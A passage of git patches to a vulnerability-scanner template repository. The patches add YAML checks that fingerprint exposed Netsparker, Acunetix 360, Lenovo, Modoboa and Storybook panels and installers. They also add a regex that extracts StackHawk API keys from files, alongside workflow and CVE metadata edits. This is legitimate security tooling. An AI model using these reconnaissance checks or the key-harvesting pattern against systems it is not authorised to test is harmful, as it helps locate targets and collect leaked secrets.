pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 4 Jan 2023 13:53:34 +0530 Subject: [PATCH 0718/1133] Acunetix 360 Installer --- .../installer/acunetix-360-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 misconfiguration/installer/acunetix-360-installer.yaml diff --git a/misconfiguration/installer/acunetix-360-installer.yaml b/misconfiguration/installer/acunetix-360-installer.yaml new file mode 100644 index 0000000000..66e92f6116 --- /dev/null +++ b/misconfiguration/installer/acunetix-360-installer.yaml @@ -0,0 +1,33 @@ +id: acunetix-360-installer + +info: + name: Acunetix 360 Installer + author: pussycat0x + severity: info + metadata: + verified: true + shodan-query: http.title:"Acunetix 360 - Installation Wizard" + tags: misconfig,exposure,install,acunetix + +requests: + - method: GET + path: + - "{{BaseURL}}/wizard/database/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Acunetix 360 - Installation Wizard" + - "License" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 \ No newline at end of file From 8e44137891a5855b9aa4edc39b3150408874a74e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 4 Jan 2023 13:57:29 +0530 Subject: [PATCH 0719/1133] Netsparker Panel --- exposed-panels/netsparker-panel.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposed-panels/netsparker-panel.yaml diff --git a/exposed-panels/netsparker-panel.yaml b/exposed-panels/netsparker-panel.yaml new file mode 100644 index 0000000000..e2b890489b --- /dev/null +++ b/exposed-panels/netsparker-panel.yaml @@ -0,0 +1,27 @@ +id: netsparker-panel + +info: + name: Netsparker Panel + author: pussycat0x + severity: info + description: | + Netsparker is a fully configurable Enterprise Dynamic Application Security Testing (DAST) tool. A DAST tool communicates with a web application using the web front-end in order to identify potential security vulnerabilities in the web application. + reference: + - https://www.invicti.com/ + metadata: + verified: true + shodan-query: http.title:"netsparker" + tags: panel,netsparker + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - "Netsparker Ltd" + - "Netsparker Enterprise" + condition: and \ No newline at end of file From b854d9a864d41625cce5ea30123fd5a8c637982e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 4 Jan 2023 13:59:44 +0530 Subject: [PATCH 0720/1133] metadata-fixed --- .../installer/netsparker-enterprise-installer.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/misconfiguration/installer/netsparker-enterprise-installer.yaml b/misconfiguration/installer/netsparker-enterprise-installer.yaml index eef80cd54a..79ebb9b7ec 100644 --- a/misconfiguration/installer/netsparker-enterprise-installer.yaml +++ b/misconfiguration/installer/netsparker-enterprise-installer.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: verified: true - shodan-query: title:"Install concrete" + shodan-query: http.favicon.hash:-1575154882 tags: misconfig,exposure,install,netsparker requests: @@ -30,4 +30,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 9355e282d1546fa02ac6c57e52711462b8f9b264 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 4 Jan 2023 14:02:04 +0530 Subject: [PATCH 0721/1133] metadata-fix --- misconfiguration/installer/acunetix-360-installer.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/misconfiguration/installer/acunetix-360-installer.yaml b/misconfiguration/installer/acunetix-360-installer.yaml index 66e92f6116..e8134b3ed8 100644 --- a/misconfiguration/installer/acunetix-360-installer.yaml +++ b/misconfiguration/installer/acunetix-360-installer.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: verified: true - shodan-query: http.title:"Acunetix 360 - Installation Wizard" + shodan-query: http.favicon.hash:-347188002 tags: misconfig,exposure,install,acunetix requests: @@ -30,4 +30,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 47b8bcd43954ec2805caeb50b71c50d95719f49e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 4 Jan 2023 19:51:48 +0530 Subject: [PATCH 0722/1133] minor -update --- exposed-panels/netsparker-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/netsparker-panel.yaml b/exposed-panels/netsparker-panel.yaml index e2b890489b..1ec34406f8 100644 --- a/exposed-panels/netsparker-panel.yaml +++ b/exposed-panels/netsparker-panel.yaml @@ -17,11 +17,11 @@ requests: - method: GET path: - "{{BaseURL}}" - + host-redirects: true matchers: - type: word part: body words: - "Netsparker Ltd" - "Netsparker Enterprise" - condition: and \ No newline at end of file + condition: and From 20a5a6b3a45893606c28a8a6bb56bb78da17af60 Mon Sep 17 00:00:00 2001 From: Hazana Date: Wed, 4 Jan 2023 14:47:40 +0000 Subject: [PATCH 0723/1133] Add StackHawk API key exposure --- file/keys/stackhawk-api-key.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 file/keys/stackhawk-api-key.yaml diff --git a/file/keys/stackhawk-api-key.yaml b/file/keys/stackhawk-api-key.yaml new file mode 100644 index 0000000000..8a8689eaeb --- /dev/null +++ b/file/keys/stackhawk-api-key.yaml @@ -0,0 +1,16 @@ +id: stackhawk-api-key + +info: + name: StackHawk API Key + author: hazana + severity: high + tags: token,file + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "hawk\\.[0-9A-Za-z\\-_]{20}\\.[0-9A-Za-z\\-_]{20}" From 8895bbb53596f410f3e2a5243474b61f6f8b1321 Mon Sep 17 00:00:00 2001 From: Joshua Rogers Date: Thu, 5 Jan 2023 10:31:18 +1100 Subject: [PATCH 0724/1133] Add Lenovo Fan & Controller Detection --- .../lenovo-fap-controller-detect.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 exposed-panels/lenovo-fap-controller-detect.yaml diff --git a/exposed-panels/lenovo-fap-controller-detect.yaml b/exposed-panels/lenovo-fap-controller-detect.yaml new file mode 100644 index 0000000000..388f41ff44 --- /dev/null +++ b/exposed-panels/lenovo-fap-controller-detect.yaml @@ -0,0 +1,35 @@ +id: lenovo-fp-panel-detect + +info: + name: Lenovo Fan and Power Controller - Detect + author: megamansec + severity: info + description: Lenovo Fan and Power controller was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + verified: true + shodan-query: http.html:"Avocent Corporation and its affiliates" + tags: panel,lenovo + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/login.html" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Avocent Corporation and its affiliates" + + - type: status + status: + - 200 + From 3878f0d8eb426dc5dd41fa0d68cabefdec11f985 Mon Sep 17 00:00:00 2001 From: Joshua Rogers Date: Thu, 5 Jan 2023 00:37:16 +0100 Subject: [PATCH 0725/1133] Update lenovo-fap-controller-detect.yaml --- exposed-panels/lenovo-fap-controller-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/lenovo-fap-controller-detect.yaml b/exposed-panels/lenovo-fap-controller-detect.yaml index 388f41ff44..ec2c4d3b60 100644 --- a/exposed-panels/lenovo-fap-controller-detect.yaml +++ b/exposed-panels/lenovo-fap-controller-detect.yaml @@ -32,4 +32,3 @@ requests: - type: status status: - 200 - From ef15dd1936271dbb2516f9679a435895e69ed8f9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 04:02:22 +0000 Subject: [PATCH 0726/1133] Auto WordPress Plugins Update [Thu Jan 5 04:02:22 UTC 2023] :robot: --- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/webp-converter-for-media.txt | 2 +- technologies/wordpress/plugins/elementskit-lite.yaml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 5678d9d16e..de4914e939 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -14.8.4 \ No newline at end of file +14.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index 566ac6388b..475e184294 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.6.1 \ No newline at end of file +5.6.2 \ No newline at end of file diff --git a/technologies/wordpress/plugins/elementskit-lite.yaml b/technologies/wordpress/plugins/elementskit-lite.yaml index aa6a26bbb9..089ed23cb3 100644 --- a/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/technologies/wordpress/plugins/elementskit-lite.yaml @@ -1,7 +1,7 @@ id: wordpress-elementskit-lite info: - name: ElementsKit Elementor addons (Header Footer Builder, Mega Menu Builder, Free Elementor Widgets & Templates Library) Detection + name: ElementsKit Elementor addons Detection author: ricardomaia severity: info reference: From 25f799a8705f3c7d38e274127bc47d5709dd4a5b Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 5 Jan 2023 11:44:21 +0530 Subject: [PATCH 0727/1133] minor -update --- exposed-panels/netsparker-panel.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/netsparker-panel.yaml b/exposed-panels/netsparker-panel.yaml index 1ec34406f8..fa642f3752 100644 --- a/exposed-panels/netsparker-panel.yaml +++ b/exposed-panels/netsparker-panel.yaml @@ -16,8 +16,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}" - host-redirects: true + - "{{BaseURL}}/account/signin?ReturnUrl=%2f" matchers: - type: word part: body From 5a2e1dd21fe38c225865cb74be66a9ee9300a4e9 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 5 Jan 2023 11:45:56 +0530 Subject: [PATCH 0728/1133] metadata -update --- exposed-panels/netsparker-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/netsparker-panel.yaml b/exposed-panels/netsparker-panel.yaml index fa642f3752..2e68739d7d 100644 --- a/exposed-panels/netsparker-panel.yaml +++ b/exposed-panels/netsparker-panel.yaml @@ -10,7 +10,7 @@ info: - https://www.invicti.com/ metadata: verified: true - shodan-query: http.title:"netsparker" + shodan-query: http.title:"Sign in to Netsparker Enterprise" tags: panel,netsparker requests: From 8c3209ab4974926b223bfd7212bd8d4ed17fdb98 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 5 Jan 2023 11:52:47 +0530 Subject: [PATCH 0729/1133] minor -update --- exposed-panels/netsparker-panel.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/exposed-panels/netsparker-panel.yaml b/exposed-panels/netsparker-panel.yaml index 2e68739d7d..640ae89f80 100644 --- a/exposed-panels/netsparker-panel.yaml +++ b/exposed-panels/netsparker-panel.yaml @@ -24,3 +24,7 @@ requests: - "Netsparker Ltd" - "Netsparker Enterprise" condition: and + + - type: status + status: + - 200 From c7ccfa7dc92f3debb1de2451a8105eb8edc09cf7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 5 Jan 2023 11:55:28 +0530 Subject: [PATCH 0730/1133] fix-template --- exposed-panels/netsparker-panel.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposed-panels/netsparker-panel.yaml b/exposed-panels/netsparker-panel.yaml index 640ae89f80..57414c85a2 100644 --- a/exposed-panels/netsparker-panel.yaml +++ b/exposed-panels/netsparker-panel.yaml @@ -17,6 +17,8 @@ requests: - method: GET path: - "{{BaseURL}}/account/signin?ReturnUrl=%2f" + + matchers-condition: and matchers: - type: word part: body @@ -24,7 +26,7 @@ requests: - "Netsparker Ltd" - "Netsparker Enterprise" condition: and - + - type: status status: - 200 From 42f7aefbb4eba38016af01896249d22ca923787b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 5 Jan 2023 12:42:37 +0530 Subject: [PATCH 0731/1133] fix-template --- ...vo-fap-controller-detect.yaml => lenovo-fp-panel.yaml} | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) rename exposed-panels/{lenovo-fap-controller-detect.yaml => lenovo-fp-panel.yaml} (77%) diff --git a/exposed-panels/lenovo-fap-controller-detect.yaml b/exposed-panels/lenovo-fp-panel.yaml similarity index 77% rename from exposed-panels/lenovo-fap-controller-detect.yaml rename to exposed-panels/lenovo-fp-panel.yaml index ec2c4d3b60..ec71c56f05 100644 --- a/exposed-panels/lenovo-fap-controller-detect.yaml +++ b/exposed-panels/lenovo-fp-panel.yaml @@ -1,10 +1,11 @@ -id: lenovo-fp-panel-detect +id: lenovo-fp-panel info: - name: Lenovo Fan and Power Controller - Detect + name: Lenovo Fan and Power Controller Panel author: megamansec severity: info - description: Lenovo Fan and Power controller was detected. + description: | + Lenovo Fan and Power controller was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 @@ -18,7 +19,6 @@ requests: - method: GET path: - "{{BaseURL}}" - - "{{BaseURL}}/login.html" host-redirects: true max-redirects: 2 From 4d1b836ad30626e2bb412a2377736e97da182ee6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 5 Jan 2023 14:55:15 +0530 Subject: [PATCH 0732/1133] Update modoboa-panel.yaml --- exposed-panels/modoboa-panel.yaml | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/exposed-panels/modoboa-panel.yaml b/exposed-panels/modoboa-panel.yaml index 941e860520..72db80edc3 100644 --- a/exposed-panels/modoboa-panel.yaml +++ b/exposed-panels/modoboa-panel.yaml @@ -1,18 +1,12 @@ id: modoboa-panel info: - name: Modoboa Login Panel - Detect + name: Modoboa Login Panel author: kh4sh3i severity: info - description: | - Modoboa login panel was detected. reference: - https://modoboa.org - https://github.com/modoboa/modoboa - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:1949005079 @@ -24,12 +18,15 @@ requests: - "{{BaseURL}}" - "{{BaseURL}}/accounts/login/?next=/" + stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - - 'Modoboa' + - 'Welcome to Modoboa' case-insensitive: true - type: status From c81a82158d100a8945cbd51afa779f9b08dae950 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 5 Jan 2023 15:35:47 +0530 Subject: [PATCH 0733/1133] Update storybook-panel.yaml --- exposed-panels/storybook-panel.yaml | 21 ++++++++++----------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/exposed-panels/storybook-panel.yaml b/exposed-panels/storybook-panel.yaml index 6949fe8412..55a24b27a1 100644 --- a/exposed-panels/storybook-panel.yaml +++ b/exposed-panels/storybook-panel.yaml @@ -1,36 +1,35 @@ id: storybook-panel info: - name: Storybook Login Panel - Detect + name: Storybook Panel Detect author: kh4sh3i severity: info - description: | - Storybook login panel was detected. reference: - https://storybook.js.org/ - https://github.com/storybookjs/storybook - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 metadata: verified: true - shodan-query: http.html:"storybook" + shodan-query: http.title:"storybook" tags: panel,storybook,workshop requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/?path=/settings/about" + stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - - 'Storybook' - case-insensitive: true + - 'Storybook' + - 'storybook-' + condition: or - type: status status: - - 200 \ No newline at end of file + - 200 From 76a354d53583fed41089c1edae192035ba4a2e4f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 5 Jan 2023 15:38:17 +0530 Subject: [PATCH 0734/1133] lint fix --- exposed-panels/storybook-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/storybook-panel.yaml b/exposed-panels/storybook-panel.yaml index 55a24b27a1..f368d3cbed 100644 --- a/exposed-panels/storybook-panel.yaml +++ b/exposed-panels/storybook-panel.yaml @@ -15,7 +15,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}" + - "{{BaseURL}}" - "{{BaseURL}}/?path=/settings/about" stop-at-first-match: true From 25c63f4409df266e5183e4ad176b5ae7dd589eac Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 5 Jan 2023 16:26:27 +0530 Subject: [PATCH 0737/1133] workflow fixes --- .github/workflows/cve-annotate.yml | 2 +- .github/workflows/new-templates.yml | 2 +- .github/workflows/syntax-checking.yml | 4 +++- .github/workflows/template-db-indexer.yml | 2 +- .github/workflows/template-validate.yml | 3 ++- .github/workflows/wordpress-plugins-update.yml | 2 ++ 6 files changed, 10 insertions(+), 5 deletions(-) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index eede299bea..48d45ba46f 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -3,7 +3,7 @@ name: ✍🏻 CVE Annotate on: push: branches: - - master + - main workflow_dispatch: jobs: diff --git a/.github/workflows/new-templates.yml b/.github/workflows/new-templates.yml index fa398b097e..d3b137b58a 100644 --- a/.github/workflows/new-templates.yml +++ b/.github/workflows/new-templates.yml @@ -3,7 +3,7 @@ name: 🥳 New Template List on: push: branches: - - master + - main workflow_dispatch: jobs: diff --git a/.github/workflows/syntax-checking.yml b/.github/workflows/syntax-checking.yml index 2040891432..3448b7baf9 100644 --- a/.github/workflows/syntax-checking.yml +++ b/.github/workflows/syntax-checking.yml @@ -1,6 +1,8 @@ name: ❄️ YAML Lint -on: [push, pull_request] +on: + pull_request: + workflow_dispatch: jobs: build: diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml index ce977e552d..edcd467f8e 100644 --- a/.github/workflows/template-db-indexer.yml +++ b/.github/workflows/template-db-indexer.yml @@ -3,7 +3,7 @@ name: 📑 Template-DB Indexer on: push: branches: - - master + - main workflow_dispatch: jobs: diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index cc353a3a70..f18b88a31d 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -1,6 +1,7 @@ name: 🛠 Template Validate -on: [ push, pull_request ] +on: + pull_request: jobs: build: diff --git a/.github/workflows/wordpress-plugins-update.yml b/.github/workflows/wordpress-plugins-update.yml index a5539b10ee..aa211f7838 100644 --- a/.github/workflows/wordpress-plugins-update.yml +++ b/.github/workflows/wordpress-plugins-update.yml @@ -1,8 +1,10 @@ name: ✨ WordPress Plugins - Update + on: schedule: - cron: "0 4 * * *" # every day at 4am UTC workflow_dispatch: + jobs: Update: runs-on: ubuntu-latest From 6cc929e2c3ff6eb72315b4d82720585f1cca90e8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 11:05:39 +0000 Subject: [PATCH 0738/1133] Auto Generated New Template Addition List [Thu Jan 5 11:05:39 UTC 2023] :robot: --- .new-additions | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/.new-additions b/.new-additions index e69de29bb2..4956d97b0c 100644 --- a/.new-additions +++ b/.new-additions @@ -0,0 +1,13 @@ +cves/2021/CVE-2021-24946.yaml +cves/2022/CVE-2022-0784.yaml +cves/2022/CVE-2022-24816.yaml +cves/2022/CVE-2022-46169.yaml +exposed-panels/mpftvc-admin-panel.yaml +exposed-panels/netsparker-panel.yaml +exposed-panels/watershed-panel.yaml +exposed-panels/zoho/manageengine-network-config.yaml +misconfiguration/installer/acunetix-360-installer.yaml +misconfiguration/installer/netsparker-enterprise-installer.yaml +network/detection/pgsql-detect.yaml +technologies/akamai-detect.yaml +token-spray/api-zerbounce.yaml From 997d941552e01f4a4e5cc1809f0eaed5fc5ed9a9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 11:21:19 +0000 Subject: [PATCH 0739/1133] Auto Generated CVE annotations [Thu Jan 5 11:21:19 UTC 2023] :robot: --- cves/2020/CVE-2020-11110.yaml | 2 +- cves/2020/CVE-2020-35476.yaml | 2 +- cves/2021/CVE-2021-24946.yaml | 5 ++++- cves/2021/CVE-2021-25099.yaml | 7 +++++-- cves/2021/CVE-2021-30128.yaml | 7 ++++++- cves/2021/CVE-2021-41773.yaml | 2 +- cves/2021/CVE-2021-42887.yaml | 2 +- cves/2022/CVE-2022-0784.yaml | 5 ++++- cves/2022/CVE-2022-0786.yaml | 5 ++++- cves/2022/CVE-2022-1595.yaml | 5 ++++- cves/2022/CVE-2022-2314.yaml | 6 ++++-- cves/2022/CVE-2022-23854.yaml | 3 +++ cves/2022/CVE-2022-24816.yaml | 9 +++++++-- cves/2022/CVE-2022-33891.yaml | 9 ++++++++- cves/2022/CVE-2022-3768.yaml | 4 ++-- cves/2022/CVE-2022-4050.yaml | 7 +++++-- cves/2022/CVE-2022-4260.yaml | 2 +- cves/2022/CVE-2022-42746.yaml | 9 +++++---- cves/2022/CVE-2022-45917.yaml | 9 +++++++-- cves/2022/CVE-2022-46169.yaml | 4 ++-- cves/2022/CVE-2022-46381.yaml | 7 ++++++- exposures/files/svn-wc-db.yaml | 2 +- vulnerabilities/vmware/vmware-nsx-stream-rce.yaml | 2 +- vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml | 2 +- 24 files changed, 84 insertions(+), 33 deletions(-) diff --git a/cves/2020/CVE-2020-11110.yaml b/cves/2020/CVE-2020-11110.yaml index d2971ae099..a2613f3356 100644 --- a/cves/2020/CVE-2020-11110.yaml +++ b/cves/2020/CVE-2020-11110.yaml @@ -19,7 +19,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: title:"Grafana" - tags: cve,cve2020,xss,grafana + tags: grafana,hackerone,cve,cve2020,xss requests: - raw: diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index 922bb0e7b4..9e52724eca 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true shodan-query: html:"OpenTSDB" - tags: cve,cve2020,opentsdb,rce + tags: cve,cve2020,opentsdb,rce,packetstorm requests: - method: GET diff --git a/cves/2021/CVE-2021-24946.yaml b/cves/2021/CVE-2021-24946.yaml index 64f254de11..2308c11db8 100644 --- a/cves/2021/CVE-2021-24946.yaml +++ b/cves/2021/CVE-2021-24946.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/modern-events-calendar-lite/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24946 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-24946 + cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2021,wordpress,wp-plugin,wp,sqli,modern-events-calendar-lite,unauth + tags: wordpress,wp-plugin,wp,unauth,wpscan,cve,cve2021,sqli,modern-events-calendar-lite requests: - raw: diff --git a/cves/2021/CVE-2021-25099.yaml b/cves/2021/CVE-2021-25099.yaml index 8759827774..ba7d21198a 100644 --- a/cves/2021/CVE-2021-25099.yaml +++ b/cves/2021/CVE-2021-25099.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/give/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25099 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2021-25099 + cwe-id: CWE-79 metadata: - verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,xss,give,unauth + verified: "true" + tags: wp-plugin,wp,give,unauth,wordpress,cve2021,xss,wpscan,cve requests: - raw: diff --git a/cves/2021/CVE-2021-30128.yaml b/cves/2021/CVE-2021-30128.yaml index 439728c9a8..c439f7e542 100644 --- a/cves/2021/CVE-2021-30128.yaml +++ b/cves/2021/CVE-2021-30128.yaml @@ -8,11 +8,16 @@ info: reference: - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2021-30128 + - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E + - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-30128 + cwe-id: CWE-502 metadata: - verified: true fofa-query: app="Apache_OFBiz" + verified: "true" tags: cve,cve2021,apache,ofbiz,deserialization,rce requests: diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index ddf881088d..ad139dccdf 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -19,8 +19,8 @@ info: cve-id: CVE-2021-41773 cwe-id: CWE-22 metadata: - verified: "true" shodan-query: Apache 2.4.49 + verified: "true" tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev variables: diff --git a/cves/2021/CVE-2021-42887.yaml b/cves/2021/CVE-2021-42887.yaml index 4e297d02a5..295b7e5b6d 100644 --- a/cves/2021/CVE-2021-42887.yaml +++ b/cves/2021/CVE-2021-42887.yaml @@ -10,7 +10,7 @@ info: - https://nvd.nist.gov/vuln/detail/cve-2021-42887 - https://github.com/p1Kk/vuln/blob/main/totolink_ex1200t_login_bypass.md classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-42887 cwe-id: CWE-287 diff --git a/cves/2022/CVE-2022-0784.yaml b/cves/2022/CVE-2022-0784.yaml index 6588a9b056..e844a268c8 100644 --- a/cves/2022/CVE-2022-0784.yaml +++ b/cves/2022/CVE-2022-0784.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/wp-experiments-free/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0784 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-0784 + cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-experiments-free,unauth + tags: cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,cve2022,wordpress requests: - raw: diff --git a/cves/2022/CVE-2022-0786.yaml b/cves/2022/CVE-2022-0786.yaml index 9024b1d7f7..0e93d86723 100644 --- a/cves/2022/CVE-2022-0786.yaml +++ b/cves/2022/CVE-2022-0786.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/kivicare-clinic-management-system/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0786 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-0786 + cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,kivicare-clinic-management-system,unauth + tags: sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,cve,cve2022,wpscan requests: - raw: diff --git a/cves/2022/CVE-2022-1595.yaml b/cves/2022/CVE-2022-1595.yaml index 9d5329b78f..32b10040f4 100644 --- a/cves/2022/CVE-2022-1595.yaml +++ b/cves/2022/CVE-2022-1595.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/hc-custom-wp-admin-url/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1595 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 cve-id: CVE-2022-1595 + cwe-id: CWE-200 metadata: verified: "true" - tags: cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,unauth + tags: unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url requests: - raw: diff --git a/cves/2022/CVE-2022-2314.yaml b/cves/2022/CVE-2022-2314.yaml index fac0172cbb..83a7fe1900 100644 --- a/cves/2022/CVE-2022-2314.yaml +++ b/cves/2022/CVE-2022-2314.yaml @@ -11,10 +11,12 @@ info: - https://wordpress.org/plugins/vr-calendar-sync/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2314 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-2314 metadata: - verified: true - tags: cve,cve2022,wordpress,wp-plugin,wp,rce,vr-calendar-sync,unauth + verified: "true" + tags: 